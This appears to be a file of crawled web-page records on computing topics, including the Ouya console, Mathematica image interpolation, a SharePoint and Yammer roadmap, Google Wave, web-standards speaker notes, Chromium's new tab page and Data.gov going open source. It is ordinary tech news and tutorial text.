While this is undoubtedly good news for anyone who’s been crossing their fingers, hoping that the Ouya can make inroads into the normally insular world of console gaming, it should be noted that while these thousand-plus developers may have attempted to reach the Ouya’s creators, the company offers no solid figures on how many of them are officially committed to bringing games to the platform. That “over a thousand” figure means little if every last developer examined the terms of developing for the Ouya and quickly declined the opportunity in favor of more lucrative options. We have no official information on how these developer conversations actually went, so until we hear a more official assessment of how many gaming firms are solidly pledging support to the Ouya platform, we’ll continue to harbor a bit of cynicism over how successful this machine might possibly be.
As for the aforementioned personnel acquisitions, though they’re less impressive than the possibility that thousands of firms are already tentatively working on games for the Ouya, they should offer a bit more hope that the company making the console will remain stable, guided by people intimately familiar with the gaming biz. According to the announcement, Ouya has attracted former IGN president (and the first investor in the Ouya project) Roy Bahat to serve as chairman of the Ouya board. Additionally, the company has enlisted former EA development director and senior development director for Trion Worlds’ MMO Rift, Steve Chamberlin, to serve as the company’s head of engineering. Finally, Raffi Bagdasarian, former vice president of product development and operations at Sony Pictures Television has been tapped to lead Ouya’s platform service and software product development division. Though you may be unfamiliar with these three men, trust that they’ve all proven their chops as leaders in their respective gaming-centric fields.
Expect to hear more solid information on the Ouya and its games line up as we inch closer to its nebulous 2013 release. Hopefully for the system’s numerous potential buyers, that quip about the massive developer interest the console has attracted proves more tangible than not. | 计算机 |
2015-48/3677/en_head.json.gz/1321 | Continuous Function Image Manipulation
Convolution is a very powerful image manipulation tool, but it is possible to go much further with Mathematica. We are now going to see how to use the unique combination of symbolic and numerical capabilities of Mathematica to manipulate images in ways impossible in any other system.
The key idea is to transform the image from a discrete matrix of values into a continuous mathematical function, which can then be manipulated mathematically.
Mathematica includes a tremendously clever and powerful feature for doing this. InterpolatingFunction objects, introduced originally to represent the solutions to differential equations, are objects that act just like ordinary functions, but are based on tables of values. The function ListInterpolation takes a list or matrix of numbers, and returns an InterpolatingFunction that can be used to get interpolated values out of the array. (A small annoyance: The Transpose function, which interchanges rows with columns in the matrix, is necessary because, without it, the x and y dimensions of the resulting function would be interchanged, which is inconvenient.)
Let's see how this function works. Say you want to find out the value of a pixel in the image. You could pick out a particular element from the original data using [[ ]] notation. For example, here is the pixel from the 130th row, 40th column.
Using the InterpolatingFunction, we can get the same value by giving the "function" these same two values as arguments.
So far, nothing remarkable. But the powerful thing about InterpolatingFunctions is that they work even when the arguments are not integers. Using [[ ]] to extract pixels, you can only pick existing pixels. With InterpolatingFunction, you can also pick pseudo pixel values from anywhere in between. For example:
Instead of thinking in terms of arrays of pixels, we can now think in terms of a mathematical function (of two variables) that happens to have z-values that correspond to the brightness of patches of our image. So, let's start thinking mathematically. What's the first thing you do with a function of two variables? Why, plot it of course.
Note that the x and y plot ranges correspond to the number of pixels in the original image. This is merely the default used by ListInterpolate. Later we'll see how to rescale the image to more generic ranges of values. For now, we are still recovering from the disappointment caused by this plot. It certainly doesn't look much like a puppy. But, it turns out this is mainly a matter of the viewpoint. Let's try a slightly different one.
Ah, there's the puppy. What happens if we apply a function to the x and y variables before passing them to puppyFunction? This has the effect of changing the spacing at which the original image is sampled, as a function of the x and y coordinates. Perhaps an example will make this clear.
This diagram may help explain the distortion better.
The parabolas represents the and functions we are using to distort the image. Towards the bottom of the image where the slope is shallow, a small portion of the original image is stretched to fill a large portion of the output image. Near the top where the slope is steep, the image is instead compressed. The same thing holds in the left/right direction. For example, look at the square at the lower right of the original image. Follow the lines, and you'll see that it turns into a much bigger square in the output image. Conversely, the upper left square, which starts out the same size, turns into a smaller square in the output image. The lower left square turns into a wide rectangle, while the upper right square turns into a tall rectangle.
Before we continue, let's redo the puppyFunction so that its x and y values run over more mathematically sensible ranges (namely, to 1 in the horizontal direction, and the appropriate range in the y direction to keep the coordinate system square).
Converted by Mathematica
[Article Index]
[Prev Page][Next Page] | 计算机 |
2015-48/3677/en_head.json.gz/1578 | RFG ID#
Submission Stats
Register for an RFG Account
Submit Game Additions / Edits
Submit Hardware Additions / Edits
You are either not logged in or not a registered member. In order to submit info to the site you must be a registered memeber and also logged in. If you are a registered member and would like to log in, you can do so via this link. If you are not a registered member and would like to register, please follow this link to register. Please note that there are perks to being logged in, such as the ability to see pending submissions and also the ability to view your submissions log.
Welcome to the RF Generation Submit Info Pages. These pages will allow you to submit info for all of the database entries, and will even allow you to submit entries to add. Use the menu to select the action that you would like to complete. If this is your first time visitng the submit pages I highly suggest that you visit the FAQ page to learn some very important info. I also suggest that you visit the FAQ if you are confused about these pages. Before you're overzealous to your home country
We know that you may or may not know whether or not the game you own is a region wide release, but we'd like for you to make a concerted effort to ensure that the title you are adding really exists. For example, you may live in the US. Therefore, you may think that all your games are US releases, right? Well, they are. But, more often than not, they are also Canadian and Mexican releases, and as such they are a North American Release. For the record, most modern releases in North America are region wide. I can actually look at the back of Mario Kart DS and see that this version of the game was not only authorized to be sold in the US but also Canada, Mexico, and Latin America! As a general rule of thumb, assume, unless you know otherwise, that the title that you are about to submit was a region wide release. Please Read the following regarding image submissions!
We appreciate all submissions that you are willing to give RF Generation, but we need to adhere to certain standards so that there is consistency in our database. As such, please take note that your scans should be 550 pixels on the short side! Your submissions could be rejected if they do not meet these size requirements! Please also note that there are exceptions to this rule, for example, you don't really need a 550 pixel wide scan of a DS or GBA game. Use proper judgement! If you have any questions please contact a staff member, as we are more than willing to help you decipher our standards. We appreciate all submissions that are made, we just want to make sure your submissions are not in vain.
Site content Copyright © rfgeneration.com unless otherwise noted. Oh, and keep it on channel three. | 计算机 |
2015-48/3677/en_head.json.gz/1898 | SharePoint Advancing the enterprise social roadmap
by SharePoint Team, on June 25, 2013February 17, 2015 | 2 Comments | 0
Today’s post comes from Jared Spataro, Senior Director, Microsoft Office Division. Jared leads the SharePoint business, and he works closely with Adam Pisoni and David Sacks on Yammer integration.
To celebrate the one-year anniversary of the Yammer acquisition, I wanted to take a moment to reflect on where we’ve come from and talk about where we’re going. My last post focused on product integration, but this time I want to zoom out and look at the big picture. It has been a busy year, and it’s exciting to see how our vision of “connected experiences” is taking shape.
Yammer momentum
First off, it’s worth noting that Yammer has continued to grow rapidly over the last 12 months–and that’s not something you see every day. Big acquisitions generally slow things down, but in this case we’ve actually seen the opposite. David Sacks provided his perspective in a post on the Microsoft blog, but a few of the high-level numbers bear repeating: over the last year, registered users have increased 55% to almost 8 million, user activity has roughly doubled, and paid networks are up over 200%. All in all, those are pretty impressive stats, and I’m proud of the team and the way the things have gone post-acquisition.
Second, we’ve continued to innovate, testing and iterating our way to product enhancements that are helping people get more done. Over the last year we’ve shipped new features in the standalone service once a week, including:
Message translation. Real-time message translation based on Microsoft Translator. We support translation to 23 languages and can detect and translate from 37 languages.
Inbox. A consolidated view of Yammer messages across conversations you’re following and threads that are most important to you.
File collaboration. Enhancements to the file directory for easy access to recent, followed, and group files- including support for multi-file drag and drop.
Mobile app enhancements. Continual improvements for our mobile apps for iPad, iPhone, Android, and Windows Phone.
Enterprise graph. A dynamically generated map of employees, content and business data based on the Open Graph standard. Using Open Graph, customers can push messages from line of business systems to the Yammer ticker.
Platform enhancements. Embeddable feeds, likes, and follow buttons for integrating Yammer with line of business systems.
In addition to innovation in the standalone product, we’ve also been hard at work on product integration. In my last roadmap update, I highlighted our work with Dynamics CRM and described three phases of broad Office integration: “basic integration, deeper connections, and connected experiences.” Earlier this month, we delivered the first component of “basic integration” by shipping an Office 365 update that lets customers make Yammer the default social network. This summer, we’ll ship a Yammer app in the SharePoint store and publish guidance for integrating Yammer with an on-prem SharePoint 2013 deployment, and this fall we’ll release Office 365 single sign-on, profile picture synchronization, and user experience enhancements.
Finally, even though we’re proud of what we’ve accomplished over the last twelve months, we recognize that we’re really just getting started. “Connected experiences” is our shorthand for saying that social should be an integrated part of the way everyone works together, and over the next year we’ll be introducing innovations designed to make Yammer a mainstream communication tool. Because of the way we develop Yammer, even we don’t know exactly what that will look like. But what we can tell you is that we have an initial set of features we’re working on today, and we’ll test and iterate our way to enhancements that will make working with others easier than ever before. This approach to product roadmap is fairly new for enterprise software, but we’re convinced it’s the only way to lead out in space that is as dynamic and fast-paced as enterprise social. To give you a sense for where we’re headed, here are a few of the projects currently under development over the next 6-8 months:
SharePoint search integration. We’re enabling SharePoint search to search Yammer conversations and setting the stage for deeper, more powerful apps that combine social and search.
Yammer groups in SharePoint sites. The Yammer app in the SharePoint store will allow you to manually replace a SharePoint site feed with a Yammer group feed, but we recognize that many customers will want to do this programmatically. We’re working on settings that will make Yammer feeds the default for all SharePoint sites. (See below for a mock-up of a Yammer group feed surfaced as an out-of-the-box component of a SharePoint team site.)
Yammer messaging enhancements. We’re redesigning the Yammer user experience to make it easier to use as a primary communication tool. We’ll also be improving directed messaging and adding the ability to message multiple groups at once.
Email interoperability. We’re making it easier than ever to use Yammer and email together. You’ll be able to follow an entire thread via email, respond to Yammer messages from email, and participate in conversations across Yammer and email.
External communication. Yammer works great inside an organization, but today you have to create an external network to collaborate with people outside your domain. We’re improving the messaging infrastructure so that you can easily include external parties in Yammer conversations.
Mobile apps. We’ll continue to invest in our iPad, iPhone, Android, Windows Phone 8, and Windows 8 apps as primary access points. The mobile apps are already a great way to use Yammer on the go, and we’ll continue to improve the user experience as we add new features to the service.
Localization. We’re localizing the Yammer interface into new languages to meet growing demand across the world.
It will take some time, and we’ll learn a lot as we go, but every new feature will help define the future–one iteration at a time.
When I take a moment to look at how much has happened over the last year, I’m really proud of the team and all they’ve accomplished. An acquisition can be a big distraction for both sides, but the teams in San Francisco and Redmond have come together and delivered. And as you can see from the list of projects in flight, we’re definitely not resting on our laurels. We’re determined to lead the way forward with rapid innovation, quick-turn iterations, and connected experiences that combine the best of Yammer with the familiar tools of Office. It’s an exciting time, and we hope you’ll join us in our journey.
–Jared Spataro
P.S. As you may have seen, we’ll be hosting the next SharePoint Conference March 3rd through the 6th in Las Vegas. I’m really looking forward to getting the community back together again and hope that you’ll join us there for more details on how we’re delivering on our vision of transforming the way people work together. Look forward to seeing you there!
amagnotta Will the Office 365 release this fall integrate with SharePoint Online? I only see SharePoint 2013 on-prem mentioned. If not, are there plans in the Road Map to integration with SharePoint Online at some point? Thanks.
CorpSec How does Yammer relate to Lync? It seems to me there’s a lot of overlap between the 2 collaboration tools. Will this evolve over time? | 计算机 |
2015-48/3677/en_head.json.gz/7622 | The Fedora Project is an openly-developed project designed by Red Hat, open for general participation, led by a meritocracy, following a set of project objectives. The goal of The Fedora Project is to work with the Linux community to build a complete, general purpose operating system exclusively from open source software. Development will be done in a public forum. The project will produce time-based releases of Fedora about 2-3 times a year, with a public release schedule. The Red Hat engineering team will continue to participate in building Fedora and will invite and encourage more outside participation than in past releases. Fedora 15, a new version of one of the leading and most widely used Linux distributions on the market, has been released. Some of the many new features include support for Btrfs file system, Indic typing booster, redesigned SELinux troubleshooter, better power management, LibreOffice productivity suite, and, of course, the brand-new GNOME 3 desktop: "GNOME 3 is the next generation of GNOME with a brand new user interface. It provides a completely new and modern desktop that has been designed for today's users and technologies. Fedora 15 is the first major distribution to include GNOME 3 by default. GNOME 3 is being developed with extensive upstream participation from Red Hat developers and Fedora volunteers, and GNOME 3 is tightly integrated in Fedora 15." manufacturer website
1 dvd for installation on an 86_64 platform back to top | 计算机 |
2015-48/3677/en_head.json.gz/8415 | ChildrensBookstore.com takes off after six years as a lingering hobby.
Jake Ball bought the domain name for ChildrensBookstore.com in 2005, thinking if he only built the site he’d get rich, he says. Six years later, after doing not much with the online store other than selling a handful of kids’ books locally per month, Ball decided he must either get the businesses going or sell the domain and wash his hands of it. He chose to commit. “I was going to get serious about it, put some real capital into this thing and make it into a business,” he says.
Now ChildrensBookstore.com receives 10-12 orders a day and is on track to reach 70 orders a day by the end of the year, which would make the retailer a $1.5 million-per-year business, Ball says. He’s hired three employees to help create content for the site and work on search engine optimization, and enlisted vendors that handle link-building and web development, he says. By the end of the year, he expects he’ll be able to quit his day job and focus solely on e-commerce.
“You can’t nibble at the edges of a competitive market like books,” Ball says. “You won’t get anywhere. You have to jump in with both feet.”
To get started, he says he found a web development company in his hometown of Boise, ID, Tribute Media, to make his site more professional and share some industry expertise. The company suggested he attend the Internet Retailer Conference & Exhibition to learn more, he says, so in June 2012 he flew to Chicago for the event.
When he got there, he says he felt like the country mouse in the children’s fable suddenly introduced to the big city—he’d had no idea about the scope of retailers, vendors, tools and strategies involved in e-commerce. He was exposed to new software available for ChildrensBookstore.com, discovered the meaning of “SEO” and learned how to engage customers and build his business, he says.
Ball hired another Boise-based company that he met at the show, Page One Power, which builds custom links to ChildrensBookstore.com from other web sites relevant to the store and its keywords, such as parenting sites, in order to drive traffic to the retailer and raise its ranking on search engine results pages, he says. Since making those changes, Ball has seen a dramatic uptick in both traffic and sales, he says. “The month-over-month increases are now geometric rather than tiny,” he says. “We’re still at the beginning of this thing, but, if I stay on the path I’m on now, we’ll be a serious business here in not too long—not just some goofy hobby.”
Besides realizing he’d need to make staff and technology investments to build the store, Ball says he learned at IRCE that the key to success in online retail is to provide consumers with something valuable that’s unavailable anywhere else. “You can’t just sell cheaper than others,” he says. To that end, ChildrensBookstore.com now posts daily book reviews written by Ball and his staff, along with articles for parents and teachers about literacy and getting children to read, he says. He also added to the site an Authors section that features favorite authors selected by ChildrensBookstore.com, each with their own page including a biography, interviews and a list of all their books available on the site, Ball says.
“The real goal is to create an experience for parents and teachers with good information about books they want to buy for their kids,” he says. “I kind of knew it, but I didn’t know how to actually do it, like what steps I could take to actually build value for my users.”
Now Ball continually thinks about what features will help his customers and then works with his web developers to add them to the site, he says. “Your project is never done, you just get little milestones and have to move on to the next thing,” he says. “The minute a site is ‘done,’ it starts stalling. If you don’t innovate, you’re toast.”
ChildrensBookstore.com
IRCE
Jake Ball
Page One Power
Tribute Media
web-only retailers
Why the web was my best friend this holiday season Please enable JavaScript to view the comments powered by Disqus. | 计算机 |
2015-48/3677/en_head.json.gz/10685 | Published on O'Reilly (http://oreilly.com/)
An Introduction to Google Wave - Google Wave: Up and Running
by Andres Ferrate
This article provides a general overview of Google Wave that should serve to familiarize you with this new and exciting platform. Keep in mind that Google Wave represents a dynamic technology that has not matured yet, so the look and feel may change in the coming months (maybe even in the coming days!).
This excerpt is from Google Wave: Up and Running. Learn how to build applications with Google Wave, the exciting real-time communication and collaboration platform. This new technology unifies email, instant messaging (IM), wiki, and social networking functions in one integrated interface. With this book, you'll quickly learn how to use Google Wave's APIs to extend the platform and customize its functions and display.
So What Exactly Is Google Wave
Simply stated, Google Wave is a real-time communication and collaboration platform that incorporates several types of web technologies, including email, instant messaging (IM), wiki, online documents, and gadgets. In more technical terms, Google Wave is a platform based on hosted XML documents (called waves) supporting concurrent modifications and low-latency updates.1
Google Wave itself represents a new approach aimed at improving communication and collaboration through the use of a combination of established and emerging web technologies. Google generally describes Google Wave as a platform, and in a broader context, as a set of three interdependent layers:
Product Layer
The Google Wave product is the web application people use to access and edit waves. It's an HTML 5 application, built on Google Web Toolkit. It includes a rich text editor and other functions like desktop drag-and-drop (which, for example, lets you drag a set of photos right into a wave).2 Most people using Google Wave during the public preview will be accessing the product layer. Throughout the remainder of the article I will refer to this product as the Google Wave Client.
Platform Layer
Google Wave can also be considered a platform with a rich set of open APIs that allow developers to embed waves in other web services, and to build new extensions that work inside waves.2
Protocol Layer
The Google Wave protocol is the underlying format for storing and the means of sharing waves, and includes the �live� concurrency control, which allows edits to be reflected instantly across users and services. The protocol is designed for open federation, such that anyone's Wave services can interoperate with each other and with the Google Wave service. To encourage adoption of the protocol, Google has made the code behind Google Wave open source.2
It's important to understand the significance of these three layers. Most people perceive Google Wave in a simplistic way, primarily thinking of Google Wave as a web application.
The reference to Google Wave as a "platform" in general terms (i.e., not in the technical definition of a platform, as stated above) is based more on the lack of other words that can adequately describe something as broad and new as Google Wave. Thus when someone references Google Wave, the connotation may be different, depending on the the user and audience.
The combination of these three layers represents a fairly comprehensive offering that is readily accessible to a large number of users with varying degrees of technical proficiency. Figure 1-2 shows how each layer is represented and the likely audience that will utilize each layer.
Figure 1-2. Each layer in Google Wave has a different representation and a distinct audience. Note that there are interdependencies between the layers, and subsequently, between the intended audience.
It's important to note that Google Wave is the branded name that Google uses to describe the product, platform, and protocol it has developed. However, because the platform layer is externally accessible and the protocol layer is open source, it is likely that third parties will offer products and tools that use names other than "wave" in order to establish new brands and market differentiation. In essence, these third parties will act as wave providers. Keep this in mind as Google Wave gains in popularity and different types of wave providers potentially emerge.
Communication and Collaboration Inside the Browser
Dion Hinchcliffe describes Google Wave as a collaboration and communication mashup that "consists of a dynamic mix of conversation models and highly interactive document creation via the browser." This is an important observation, because the Google Wave client follows a common trend for new applications to operate completely within the browser.
Google Wave's user interface and functionality are created using Google Web Toolkit, which transforms Java code to HTML, CSS, and JavaScript. By leveraging AJAX and the new HTML 5 standard, the Google Wave Client offers a rich set of features and functionality that provide a user experience similar to that of a desktop application.
Figure 1-3 shows how Google Wave displays various types of information using "panes" in a single-page user interface, including an inbox, contacts, navigation, and threaded conversation.
Figure 1-3. The Google Wave user interface includes panes that dynamically update with content as users interact with waves.
What about Riding Waves Outside of Your Browser?
The Google Wave Client interface represents Google's preferred approach for managing the user experience as an application in the web browser. However, Google Wave's APIs and its open source elements (including the network protocol) provide an opportunity for third parties to develop their own user interfaces, including desktop, mobile, and browser-based applications (much in the same way that there are numerous Twitter applications out there).
You can view this the same way as email and the ways in which it is accessed and used via a variety of applications (e.g., I use both Mozilla's Thunderbird desktop application and my browser to access my GMail account, depending on where I am and which computer I am using). It's likely that we will see different desktop and browser applications used to access waves from different wave providers as developers hone their skills with the Google Wave APIs and the network protocol gains in popularity.
Waves, Wavelets, and Blips, Oh My!
Several common terms are used to describe elements relevant to Google Wave. As you become more familiar with the terminology, keep in mind that there is a hierarchy for many core terms; thus, there is a logical line of descendence that you can follow. Some of the more common terms with which you should be familiar include waves, wavelets, blips, robots, and gadgets (see Figure 1-3).
Figure 1-4. A general overview of how a wave is structured. Waves contain wavelets, which are containers for blips (messages) added by participants. Extensions, in the form of robots and gadgets augment the conversation between participants in a wave by adding different types of features and functionality to a conversation.
In general terms, a wave is a container for an enhanced set of threaded conversations that is viewable as a document, consisting of one or more participants (which may include both human participants and robots). The wave is a dynamic entity that contains state and stores historical information. A wave is a living thing, and it is modified in real-time based on participant's actions. A wave contains one or more wavelets defined below.3
Waveletes
A wavelet is a threaded conversation that is spawned within a wave. Wavelets serve as the container for one or more messages, known as blips. The wavelet is the basic unit of access control for data in a particular wave. All participants on a wavelet have read/write access to content within the wavelet. Additionally, all events that occur within the Google Wave APIs operate at the wavelet level or lower.3
A blip is the basic unit of conversation and consists of a single message that appears in a wavelet. Blips may either be drafts or published (by clicking "Done" within the Wave client). Blips manage their content through their document, defined below. Blips may also have other blips as children, forming a blip hierarchy. Each wavelet always consists of at least one root blip.3
Each wave has a set of one or more participants. Participants are either humans or robots (see Robots below) that actively engage and interact in a wave. Participants are added to a wave by existing participants. | 计算机 |
2015-48/3677/en_head.json.gz/12564 | Speaker's Notes for WebWorld Orlando
Whoddathnunkit?
My first exposure to the world-wide web just a little over two years ago was on an obscure internet discussion forum -- alt.hypertext. Today, folks discover the web through Time, Newsweek, and the Wall Street Journal. And when I saw that Burlington Coat Factory had a storefront on the web, I realized that it's no longer just a cool "net.project" -- it's a way of doing business. It's becoming consumer technology
That's what brings us here today -- the promise of a revolutionary new consumer technology. The web is undisputably the hottest technology trend today. But will it last?
Technology trends are like stars -- some never get past the vapor stage. Some grow too fast -- they go supernova and end up as white dwarves -- nice markets -- or black holes -- a danger to anything near them. But my view is that the world-wide web will have a long, healthy life as a pervasive technology. The marriage of distributed hypermedia and the decentralized networking infrastructure of the Internet is evidently just what the times are calling for.
Obviously a lot of people are using the net and the web today. But a whole lot more are sitting on the side of the pool, watching the trade rags, testing the water, and trying to decide if and when to jump in.
In high-tech markets, the web is already cost-effective. Hewlet Packard actually reduced support costs and increased customer satisfaction by delivering more information via the web and less by telephone.
Other web markets are not so mature today. But they're all growing. Various measurements of the size of the Internet and its markets may be all over the scale, but they all show the same trend of exponential growth. Smart business folks realize that even though the web may not be cost-effective today, the cost of playing catch-up tomorrow might kill them.
And clearly, there are large market segments where the producers and the consumers are sitting on opposite sides of a technology gap. They can't find each other in the vastness of the global information space. They can't exchange payments securely and reliably. The data formats limit the expressive capability of the information providers. And in this age of instant gratification, nobody wants to wait for information once they've found it.
This market demand for better web technology has not gone unnoticed. Enter Spyglass. Spry. Netscape. O'Reilly, EIT. And on their heels come IBM, Novell, Microsoft, Lotus, and MCI. Not to mention the legion of consultants, access providers, information providers, digital librarians and editors, and support organizations. And don't forget the internet software development community that brought you Mosaic, USENET News, Internet Relay Chat, and the other ubiquitous applications on the internet.
Believe it or not, that "free software" community is a stabilizing influence on this market frenzy: one thing that draws information providers to the web is the tremendous size of the audience. Depending on any technology that's not royalty-free severely limits the audience.
The result is that while these companies can add value to the web by offering stability, support, and custom applications, it would be self-destructive for them to "splinter off" by failing to interoperate with the mainstream web.
So how do vendors differentiate themselves? Where does innovation fit it? After all, growth of the market depends on confidence in the technology which comes from a blend of the promise of an upgrade path with a proven track record of reliability.
This is the crucial role of interface specifications -- specifications of how various parts of the whole system operate. One way to look at these specifications is to say that they divide the world of all possible behaviours into mandatory, optional, and forbidden behaviours.
For instance, let's take the classic example of the interface between a driver an a car. A spec might say that a car must have a steering wheel, breaks, and accelerator, and it would specify their location relative to the driver. The car may have a clutch and stick shift. The car may not have the driver's seat behind the passenger seat. And there are certain parameters that are open to individual interpretation, like the location of the headlight control. Moreover, some features of the driver/cockpit interface are completely independent of the basic operation of the car -- the stereo controls, for example.
The same is true of web software: some browsers support images. Some don't. Some servers support full-text searching. Some don't. And some offer a "hook" like the CGI interface where searching and other features can be added as an "after-market" option.
We are just now to the point where we have enough experience and shared understanding of the interaction between web software components to submit specifcations to a formal standardization process. There are a few key characteristics of successful specifications that I'd like to discuss, and a few key properties of a standards process that has a proven record of producing them.
First, a specfication must be complete to be successful. If significant aspects are left unspecified, then there is a possibility that independent projects or products will vary in their implementation of those aspects. And Murphy's law says that possibility should be considered a certainty. The result is that two implementations that adhere to everything in the spec do not interoperate. That's pretty much the definition of a specification failure.
On the other hand, you have to be careful not to overspecify an interface. It's a little bit annoying, sometimes, the way different cars have different ways to honk the horn. But if the location of the horn were limited to the traditional middle-of-the-steering-wheel position, where would we put a driver's-side air bag? And I personally think putting the stereo controls in the steering wheel is the best idea since the lightbulb. So we see that minimal specification is key to extensibility and growth.
The last characteristic I'd like to emphasize is modularity. If you can break a large, complex system into two or more smaller, simpler systems, that's the way to go. That way, you can replace one of them in the future without starting from scratch on the others. The HTTP protocol, the HTML data format, and the URL addressing scheme are modular parts of the web technology, for example.
In fact, each of those aspects of the web technology is being standardized somewhat independently. You'll hear more about the HTML, HTTP, and URI working groups in Dave Raggett's presentation on the state of web standards. But I'd like to discuss the Internet Engineering Task Force and the IETF standards process, because it has a proven track-record of creating specification that work.
Standardizing specifications is really just the last step in the overall IETF technology deployment life cycle. First, an idea is proposed, perhaps to a working group chair and then to the group, if it seems appropriate. The proposal is batted around, reviewed, enhanced, or maybe trimmed down. Then the proposal is distributed as an internet draft, perhaps more than once due to review comments. But they don't write the result in stone just because they believe it looks finished. During this review process, members of the group are busy gaining real-world experience by implementing and testing the proposal. Once there are two independent implementations and the working group reaches consensus, the proposal is archived as an RFC -- a request for comments. If it stands the test of some more time, it may become and Internet Standard.
The keys to success in this process are an open process of consensus building, and implementaiton experience concurrent with standardization.
If you think that this seems like a long, tedious process for rolling out new technology, you're not far off. But remember: the target for this effort is lasting, shared technology.
If you want to deploy something new today, then you might be able to skip all that and get right to it. You just have to make sure that the feature you're after can be deployed in your application domain without causing interoperability problems with other domains. This can be a tricky task, given the volatile state of web specs today.
But for example, look at the netscape extensions to HTML. Netscape is catching a certain amount of flak for not sumitting a proposal for public review before deploying them. But I believe they made an honest effor to investigate and avoid interoperability problems. If you add, say, a <blink> tag to a document, it doesn't cause mosaic or any other browsers to behave strangely. So while the netscape extensions violate the letter of the current HTML spec, they do not viloate the spec in spirit.
As a counterexample, we can look back to the introduction of forms in HTML. Information providers that wanted to use forms had to include disclaimers like "look out! If you don't have Mosaic 2.0 or some other forms-capable browser, this page will look funky." There are
mechanisms in the protocol that could have been used to let the software figure that out
without manual intervention.
It's one thing to add features to the system and encourage users to upgrade to software that supports them. It's quite another to carelessly deploy features that makes the installed base of implementations look broken. That forces users to upgrade, and destroys confidence in the technology. Anyone looking at the web as a basis for mission-critical applications will
be watching closely to be sure that enhancements are gracefully deployed. If they see the rules broken too many times, they'll just have to find some other way to get their job done.
So what will be the ultimate fate of the netscape extensions? Will they become standard? I don't know. Some probably will, some probably won't, and some will likely be adopted in modified form. All that will be decided over time in the HTML working group. If you have an interest in seeing it go one way or another, that's the place to make your case. IETF working groups are open to all comers.
(I haven't keyed in the rest of my notes yet.)
Daniel W. Connolly
$Id: speak.html,v 1.1 1997/07/06 06:21:10 connolly Exp $ | 计算机 |
2015-48/3677/en_head.json.gz/13125 | Chrome Tests an Updated New Tab Page
Chromium, the open source version of Google Chrome, includes a more customizable new tab page. You can easily pin, remove and reorder thumbnails without having to enter in the edit mode. Pinned items are always displayed in the new tab page, which now shows only 8 thumbnails, even if they're no longer frequently visited.The list of search engines and the recent bookmarks have been removed and there's a new section of recent activities that includes recently-closed tabs and recent downloads. Another new section is called "recommendations", but it's still a work in progress.You can hide the thumbnails, hide the list of recent activities and the recommendations if you don't find them useful.The updated tab page is not yet ready to be released, but you can enable it if you have a recent Chromium build (Windows, Mac, Linux) by editing the desktop shortcut and adding the following flag in the target field: --new-new-tab-page | 计算机 |
2015-48/3677/en_head.json.gz/13398 | More Topics DataDesignEmerging TechIoTProgrammingWeb Ops & PerformanceWeb Platform We're in the process of moving Radar to the new oreilly.com. Check it out. Print
Listen White House to open source Data.gov as open government data platform
The new "Data.gov in a box" could empower countries to build their own platforms.
by Alex Howard | @digiphile |
| December 5, 2011 Comments: 3
As 2011 comes to an end, there are 28 international open data platforms in the open government community. By the end of 2012, code from new “Data.gov-in-a-box” may help many more countries to stand up their own platforms. A partnership between the United States and India on open government has borne fruit: progress on making the open data platform Data.gov open source. In a post this morning at the WhiteHouse.gov blog, federal CIO Steven VanRoekel (@StevenVDC) and federal CTO Aneesh Chopra (@AneeshChopra) explained more about how Data.gov is going global:
As part of a joint effort by the United States and India to build an open government platform, the U.S. team has deposited open source code — an important benchmark in developing the Open Government Platform that will enable governments around the world to stand up their own open government data sites.
The development is evidence that the U.S. and India are indeed still collaborating on open government together, despite India’s withdrawal from the historic Open Government Partnership (OGP) that launched in September. Chopra and VanRoekel explicitly connected the move to open source Data.gov to the U.S. involvement in the Open Government Partnership today. While we’ll need to see more code and adoption to draw substantive conclusions on the outcomes of this part of the plan, this is clearly progress.
The U.S. National Action Plan on Open Government, which represents the U.S. commitment to the OGP, included some details about this initiative two months ago, building upon a State Department fact sheet that was released in July. Back in August, representatives from India’s National Informatics Center visited the United States for a week-long session of knowledge sharing with the U.S. Data.gov team, which is housed within the General Services Administration.
“The secretary of state and president have both spent time in India over the past 18 months,” said VanRoekel in an interview today. “There was a lot of dialogue about the power of open data to shine light upon what’s happening in the world.”
The project, which was described then as “Data.gov-in-a-box,” will include components of the Data.gov open data platform and the India.gov.in document portal. Now, the product is being called the “Open Government Platform” — not exactly creative, but quite descriptive and evocative of open government platforms that have been launched to date. The first collection of open source code, which describes a data management system, is now up on GitHub.
During the August meetings, “we agreed upon a set of things we would do around creating excellence around an open data platform,” said VanRoekel. “We owned the first deliverable: a dataset management tool. That’s the foundation of an open source data platform. It handles workflow, security and the check in of data — all of the work that goes around getting the state data needs to be in before it goes online. India owns the next phase: the presentation layer.”
If the initiative bears fruit in 2012, as planned, the international open government data movement will have a new tool to apply toward open data platforms. That could be particularly relevant to countries in the developing world, given the limited resources available to many governments. What’s next for open government data in the United States has yet to be written. “The evolution of data.gov should be one that does things to connect to web services or an API key manager,” said VanRoekel. “We need to track usage. We’re going to double down on the things that are proving useful.” Drupal as an open government platform?
This Open Government Data platform looks set to be built upon Drupal 6, a choice that would further solidify the inroads that the open source content management system has made into government IT. As always, code and architecture choices will have consequences down the road.
“While I’m not sure Drupal is a good choice anymore for building data sites, it is key that open source is being used to disseminate open data,” said Eric Gunderson, the founder of open source software firm Development Seed. “Using open source means we can all take ownership of the code and tune it to meet our exact needs. Even bad releases give us code to learn from.” Jeff Miccolis, a senior developer at Development Seed, concurred about how open the collaboration around the Data.gov code has been or will be going forward. “Releasing an application like this as open source on an open collaboration platform like Github is a great step,” he said. “It still remains to be seen what the ongoing commitment to the project will be, and how collaboration will work. There is no history in the git repository they have on GitHub, no issues in the issue tracker, nor even an explicit license in the repository. These factors don’t communicate anything about their future commitment to maintaining this newly minted open source project.”
The White House is hoping to hear from more developers like Miccolis. “We’re looking forward to getting feedback and improvements from the open source community,” said VanRoekel. “How do we evolve the U.S. data.gov as it sits today?”
Strata 2012 — The 2012 Strata Conference, being held Feb. 28-March 1 in Santa Clara, Calif., will offer three full days of hands-on data training and information-rich sessions. Strata brings together the people, tools, and technologies you need to make data work.
Save 20% on registration with the code RADAR20
Open data impact
From where VanRoekel sits, investing in open source, open government and open data remain important to the administration. He said to me that the fact that he was hired was a “clear indication of the importance” of these issues in the White House. “It wasn’t a coincidence that the launch of the Open Government Partnership coincided with my arrival,” he said. “There’s a lot of effort to meet the challenge of open government,” according to VanRoekel. “The president has me and other people involved meeting every week, reporting on progress.”
